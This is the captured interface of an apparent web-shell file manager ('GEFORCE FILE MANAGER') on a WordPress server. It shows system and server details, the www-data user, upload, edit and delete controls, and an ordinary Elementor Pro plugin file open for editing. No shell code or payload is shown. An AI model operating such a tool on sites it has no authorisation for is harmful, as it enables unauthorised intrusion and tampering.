[ SYSTEM ]: Linux wordpress 6.1.0-44-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.164-1 (2026-03-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
plugins
/
elementor-pro
/
modules
/
theme-builder
/
admin-menu-items
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 theme-builder-menu-item.php
679 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: theme-builder-menu-item.php
<?php namespace ElementorPro\Modules\ThemeBuilder\AdminMenuItems; use Elementor\Core\Admin\Menu\Interfaces\Admin_Menu_Item; use Elementor\TemplateLibrary\Source_Local; if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } class Theme_Builder_Menu_Item implements Admin_Menu_Item { public function get_capability(): string { return 'publish_posts'; } public function get_label(): string { return esc_html__( 'Theme Builder', 'elementor-pro' ); } public function get_parent_slug(): string { return Source_Local::ADMIN_MENU_SLUG; } public function is_visible(): bool { return true; } public function get_position(): ?int { return 20; } }